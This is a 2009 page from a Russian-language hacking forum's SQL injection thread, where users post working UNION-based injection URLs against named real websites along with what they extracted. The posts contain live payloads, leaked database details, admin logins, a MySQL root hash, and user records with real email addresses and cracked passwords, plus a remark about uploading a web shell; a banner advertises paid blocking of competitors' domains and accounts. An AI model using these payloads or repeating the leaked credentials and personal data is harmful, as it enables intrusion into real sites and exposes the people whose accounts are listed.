SQL Инъекции — ANTICHAT Forum

FORUMS

MEMBERS

RECENT POSTS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
SQL Инъекции

Страница 772 из 1602

772

Опции темы

Поиск в этой теме

Опции просмотра

Девушки....

16.02.2009, 19:05

Gorev

Познавший АНТИЧАТ

Регистрация: 31.03.2006

Сообщений: 1,167

Провел на форуме:
4072944

Репутация: 1550

Отправить сообщение для Gorev с помощью Yahoo

Девушки....

http://www.escorts-romania.net/en_articles.php?sid=-3+UNION+SELECT+1,2,3,4,5,concat_ws(0x3a,version(), database(),user()),7,8,9,10,11,12

Database Version: 4.1.25-Debian_mt1
Database name: db24939_escorts
User name: db24939@64.13.232.28

16.02.2009, 19:05

Assembler

Участник форума

Регистрация: 01.09.2007

Сообщений: 203

Провел на форуме:
812964

Репутация: 302

Код:

http://www.incity.ac/ua/firms/insurance/alfa.php?city=-1%20union%20select%201,table_name,3,4,5,6,7%20from%20information_schema.tables--

(Таблицы)

Код:

http://www.incity.ac/ua/firms/insurance/alfa.php?city=-1%20union%20select%201,concat_ws(0x3a,adm_name,adm_login,adm_password)%20,3,4,5,6,7%20from%20insity_adm--

(Админские данные)

adm_name,adm_login,adm_password

Andrew:incityadmin:incityadmin

Админку не нашел.. =(

summitmediapartners.com

16.02.2009, 19:15

~~faza02~~

Banned

Регистрация: 21.11.2007

Сообщений: 181

Провел на форуме:
1066435

Репутация: 1013

summitmediapartners.com

Код:

http://www.summitmediapartners.com/filemgmt/singlefile.php?lid=-2+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16--

5.0.67-community

таблицы: gl_users
колонки: username, passwd

админка:

Код:

http://www.summitmediapartners.com/admin/moderation.php

16.02.2009, 19:36

Gorev

Познавший АНТИЧАТ

Регистрация: 31.03.2006

Сообщений: 1,167

Провел на форуме:
4072944

Репутация: 1550

http://www.raft.ro/produs.php?idprodus=17720+UNION+SELECT+1,AES_DECRY PT(AES_ENCRYPT(CONCAT_WS(0x3a,Version(),Database() ,User()),0x71),0x71),3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 ,32,33,34,35,36,37+LIMIT+1,1

Database Version: 4.0.23-nt
Database name: raft
User name: raftdb@localhost

http://www.raft.ro/produs.php?idprodus=17720+UNION+SELECT+1,AES_DECRY PT(AES_ENCRYPT(CONCAT_WS(0x3a,userid,email,usernam e,password),0x71),0x71),3,4,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 ,31,32,33,34,35,36,37+from+users+LIMIT+1,1

16.02.2009, 20:30

spherics

Участник форума

Регистрация: 14.01.2008

Сообщений: 174

Провел на форуме:
800953

Репутация: 443

PageRank = 6

Цитата:

http://www.worldsbk.com/pubb_EN/news_ext.php?id=2580970966539+union+select+concat_ ws(0x3a,version(),user(),database())--

Database Version: 5.0.32-Debian_7etch6-log
Database name: worldsbk
User name: mysqlweb@192.168.1.73

Цитата:

http://www.worldsbk.com/pubb_EN/news_ext.php?id=2580970966539+union+select+concat_ ws(0x3a,user,password)+from+mysql.user--

root : *D6D90523CDBE293EFE62145B33F293D273308551

Цитата:

http://ww2.jhu.edu/~osi/show_group.php?inputGroup=-201+union+select+concat_ws(0x3a,version(),user(),d atabase())--

Database Version: 5.0.45
Database name: osi
User name: osi@localhost

Цитата:

http://ww2.jhu.edu/~osi/show_group.php?inputGroup=-201+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(CONCAT(0x 3a,(SELECT+CONCAT(USERID,0x3a,USERNAME,0x3a,PASSWO RD,0x3a,TYPE,0x3a,EMAIL)+FROM+osi.USERS+LIMIT+4,1) ,0x3a),0x71),0x71)--

USERID : USERNAME : PASSWORD : TYPE : EMAIL

:1:briansuk:b0544c87bad417ec3cbbdb25ef4705c4:A:b_s uk@jhu.edu хэш MD5:b0544c87bad417ec3cbbdb25ef4705c4 : brianbrian
:6:afriant1:964e3f989bc8389d161320484dc3ef31:V:afr iant1@jhu.edu
:5:1photo2:1cd760c843449a0ecb9aa20afacbeff7:V:di7@ jhu.edu хэш MD5:1cd760c843449a0ecb9aa20afacbeff7 : 2photo3
:3:briantest:b45f850374b26692270d10fb090ad09d:V:b_ suk@hotmail.com
:2:jgroden1:c064a79ee9f78586511a548e784b5a2d:A:jgr oden1@jhu.edu хэш MD5 : c064a79ee9f78586511a548e784b5a2d : bluejays

Админка

http://ww2.jhu.edu/~osi/administrator/

Шелл льём через загрузку компонентов.Хотя на любителя.)

Savemode OFF

16.02.2009, 20:32

Gorev

Познавший АНТИЧАТ

Регистрация: 31.03.2006

Сообщений: 1,167

Провел на форуме:
4072944

Репутация: 1550

http://ciupercarii.ro/index.php?section=vanzari_details&id_prod=-14+UNION+SELECT+1,2,3,concat_ws(0x3a,version(),dat abase(),user()),5,6

Database Version: 5.0.67-community
Database name: ciuperca_ciupercarie
User name: ciuperca_ciuperc@localhost

http://ciupercarii.ro/login

admin:admin

16.02.2009, 20:40

f1ng3r

Участник форума

Регистрация: 14.01.2009

Сообщений: 257

Провел на форуме:
1936181

Репутация: 688

PageRang - 7

Код:

http://www.disco.bg/designs/classic2_bg.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),database( ),user()),4,5,6,7,8,9,10,11 ,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71--

Database Version :5.0.67-community-log
Database name : discobg_disco
User name : discobg_site2@localhost

в таблицах нахожу клиентов:

Код:

http://www.disco.bg/designs/classic2_bg.php?id=-1+union+select+1,2,table _name,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71+from+information _schema.tables+limit+31,1--

В колонах узнаю:

Код:

http://www.disco.bg/designs/classic2_bg.php?id=9999999+union+select+1,2,COLUMN_NAME,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71+from+INFORMATION_SCHEMA.COLUMNS+PROFILING+WHERE+TABLE_NAME+ LIKE+char(112,104,112,97,100,115,95,99,108,105,101,110,116,115) +limit+6,1--

Код:

clientusername
clientpassword

но вот только почему-то он мне их не хочет выводить из phpads_clients

... напишите в личку если у кого получиться вывести все

16.02.2009, 20:54

Gorev

Познавший АНТИЧАТ

Регистрация: 31.03.2006

Сообщений: 1,167

Провел на форуме:
4072944

Репутация: 1550

http://www.peruvision.ro/inc/pag/produse/produs_detalii.php?tabela=catp_1_cat_1_subcat_1&id =-8+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,vers ion(),database(),user()),10,11,12/*&l=ro

Version : 5.0.18-log
databse : peruvisionro_1
User : peruvisionro@www2.linux.romtelecom.net.

16.02.2009, 20:56

Assembler

Участник форума

Регистрация: 01.09.2007

Сообщений: 203

Провел на форуме:
812964

Репутация: 302

http://www.bestellauto.de/index.php?who=999+union+select+1,2,3,4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26, 27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43 ,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,6 0,61,62,63,64,65,66,67,68,69,version(),71,72,73,74 ,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,9 1,92,93,94,95,96,97,98,99,100,101,102,103,104,105, 106,107,108,109,110,111,112,113,114,115,116,117,11 8,119,120,121,122,123,124,125,126,127,128,129,130, 131,132,133,134,135,136,137,138,139,140,141,142,14 3,144,145,146,147,148,149,150,151,152,153,154,155, 156,157,158,159,160,161,162,163,164,165,166,167,16 8,169,170,171,172,173,174,175,176,177,178,179,180, 181,182,183,184,185,186,187,188,189,190,191,192,19 3,194,195,196,197,198,199,200,201,202,203,204,205, 206,207,208,209,210,211,212,213,214,215,216,217,21 8,219,220,221,222,223,224,225,226,227,228,229,230, 231,232,233,234,235,236,237,238,239,240,241,242,24 3,244,245,246,247,248,249,250,251,252,253,254,255, 256,257,258,259,260,261,262,263,264,265,266,267,26 8,269,270,271,272,273,274,275,276,277,278,279,280, 281,282,283,284,285,286,287,288,289,290,291,292,29 3,294,295,296,297,298,299,300,301,302,303,304,305, 306,307,308,309,310,311,312,313,314,315,316,317,31 8,319,320,321,322,323,324,325,326,327,328,329,330, 331,332,333,334,335,336,337,338,339,340,341,342,34 3,343,345,346,347,348,349,350,351,352,353,354,355, 356,357,358,359,360,361,362,363,364,365,366,367,36 8,369,370,371,372,373,374,375,376,377,378,379,380, 381,382,383,384,385,386,387,388,389,390,391,392,39 3,394,395,396,397,398,399,400,401,402,403,404,405, 406,407,408,409,410,411,412,413,414,415,416,417,41 8,419--

4.0.24_Debian-10sarge3-log

ЫЫ я псих

#10

16.02.2009, 21:24

-m0rgan-

Постоянный

Регистрация: 29.09.2008

Сообщений: 553

Провел на форуме:
2584134

Репутация: 519

Какая то онлайн игра...
www.camelotherald.com
PR:4

Код:

http://www.camelotherald.com/news/news_article.php?storyid=-1+union+select+1,2,3,convert(concat_ws(0x3a,version(),user(),database())+using+latin1),5,6,7,8,9,10,11,12,13--

верия/юзер/бд:

Код:

4.1.10-standard:web@camelotherald.com:herald

--------------------------------------------------------------------
www.maryland.com
PR:6

Код:

http://www.maryland.com/articles/article.php?a_id=-99999+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34--

верия/юзер/бд:

Код:

4.0.24-standard-log:cms@localhost:cms

---------------------------------------------------------------------
www.cloudynights.com
PR:6

Код:

http://www.cloudynights.com/item.php?item_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,convert(concat_ws(0x3a,version(),user(),database())+using+latin1),13,14,15,16,17,18,19,20,21,22,23--

верия/юзер/бд:

Код:

4.1.14-log:asaint_6@216.92.192.94:asaint_cloudynights

----------------------------------------------------------------------
The End!

Страница 772 из 1602

772

« Предыдущая тема | Следующая тема »

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

Home

Help

Terms and Rules